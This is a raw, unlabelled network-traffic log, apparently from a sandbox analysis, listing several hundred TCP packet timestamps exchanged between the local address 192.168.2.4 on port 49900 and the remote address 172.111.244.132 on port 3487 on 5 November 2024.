                                                                                                                                                            Nov 5, 2024 10:03:29.709388018 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.709413052 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.709422112 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.709431887 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.709454060 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.709575891 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.709587097 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.709597111 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.709615946 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.709628105 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.709635973 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.709645033 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.709681988 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.709867001 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.709908962 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.709919930 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.709930897 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.709944963 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.709950924 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.709985971 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.710093975 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.710134029 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.710155010 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.710170031 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.710180044 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.710220098 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.710329056 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.710369110 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.851366043 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851417065 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851429939 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851463079 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.851485014 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851495981 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851505995 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851517916 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.851521969 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851541042 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851552963 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851561069 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.851568937 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851588964 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.851605892 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.851659060 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851669073 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851686001 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851696014 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851702929 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.851711988 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851721048 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851730108 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851752043 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.851757050 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.851778984 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.851798058 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.856445074 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.856456041 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.856467962 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.856478930 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.856492043 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.856524944 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.856750011 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.856759071 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.856770992 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.856807947 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.856820107 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.856831074 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.856841087 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.856853008 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.856862068 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.856875896 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.856879950 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.856889963 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.856915951 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.857579947 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.857590914 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.857601881 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.857611895 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.857618093 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.857629061 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.857636929 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.857651949 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.857686043 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.857738972 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.857748985 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.857758999 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.857769012 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.857778072 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.857809067 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.857939959 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.857985973 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.858004093 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858015060 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858053923 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.858072996 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858083010 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858092070 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858115911 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.858133078 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858140945 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858145952 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858150959 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858160973 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858170033 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.858198881 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.858211040 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858222961 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.858264923 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858305931 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.858318090 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858402967 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858412027 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858422995 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858453035 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.858469963 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858477116 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.858484030 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858494997 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858504057 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858525991 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.858541012 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.858659983 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858724117 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858773947 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.858844995 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858915091 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858925104 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858962059 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.858982086 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.858992100 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859003067 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859026909 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.859046936 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859059095 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.859078884 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859088898 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859098911 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859108925 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.859116077 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859133005 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.859229088 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859263897 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859272003 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.859303951 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859335899 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.859344006 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859352112 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859360933 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859380960 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.859457016 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859496117 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.859509945 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859519005 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859553099 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.859574080 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859584093 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859592915 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859615088 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.859636068 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859699965 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.859858036 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859921932 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859961987 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.859972954 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.859992027 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860002995 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860039949 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.860058069 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860066891 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860102892 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.860110044 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860152006 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.860189915 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860199928 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860208988 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860219955 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860229015 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860234976 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.860263109 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.860310078 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860320091 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860328913 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860340118 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860352993 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.860373020 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.860482931 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860522032 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.860541105 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860549927 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860567093 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860575914 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860584021 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.860610008 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.860773087 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860817909 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860836029 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860850096 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860856056 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.860863924 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860898972 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.860920906 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860938072 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860948086 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860955954 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.860961914 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860970974 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.860979080 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.861007929 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.861123085 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.861134052 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.861171961 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.861274958 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.861352921 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.861367941 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.861377001 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.861387014 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.861397028 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.861411095 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.861421108 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.861427069 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.861434937 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.861443043 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.861468077 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.861557007 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.861566067 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.861578941 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.861603975 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.861653090 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.861670971 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.861696005 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.862344980 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862353086 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862395048 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.862468958 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862514019 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.862570047 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862580061 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862591028 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862601042 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862608910 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.862617016 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862627029 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862633944 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.862646103 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862667084 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.862685919 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862695932 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862705946 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862720966 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862725973 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.862735987 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862744093 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.862751961 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862766027 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.862821102 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862832069 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862843037 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862852097 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.862865925 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.862891912 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.863039970 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863049030 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863059998 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863080978 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863090038 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.863099098 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.863104105 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863115072 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863151073 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.863296032 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863306046 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863321066 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863331079 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.863337040 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863347054 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863354921 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.863389969 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.863409042 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863419056 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863430023 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863439083 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863451004 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863456964 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.863471985 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.863483906 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863523006 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.863533974 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863617897 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863627911 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863645077 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863652945 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863665104 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.863682032 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.863816023 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863853931 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.863887072 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863895893 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863904953 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.863940954 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.998969078 CET348749900172.111.244.132192.168.2.4
